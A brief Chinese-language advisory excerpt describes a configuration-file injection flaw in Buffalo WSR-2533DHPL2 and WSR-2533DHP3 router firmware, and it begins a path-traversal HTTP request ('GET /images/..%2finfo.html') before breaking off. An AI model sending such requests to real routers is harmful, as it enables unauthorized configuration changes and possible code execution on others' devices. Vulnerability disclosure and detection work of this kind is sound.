Buffalo WSR-2533DHPL2 - 配置文件注入 Buffalo WSR-2533DHPL2 固件版本 <= 1.02 和 WSR-2533DHP3 固件版本 <= 1.24 的 Web 界面无法正确清理用户输入。经过身份验证的远程攻击者可以利用此漏洞来更改设备配置,从而有可能获得远程代码执行。 代码语言:javascript 复制 GET/images/..%2finfo.htmlHTTP/1.1Host:{{...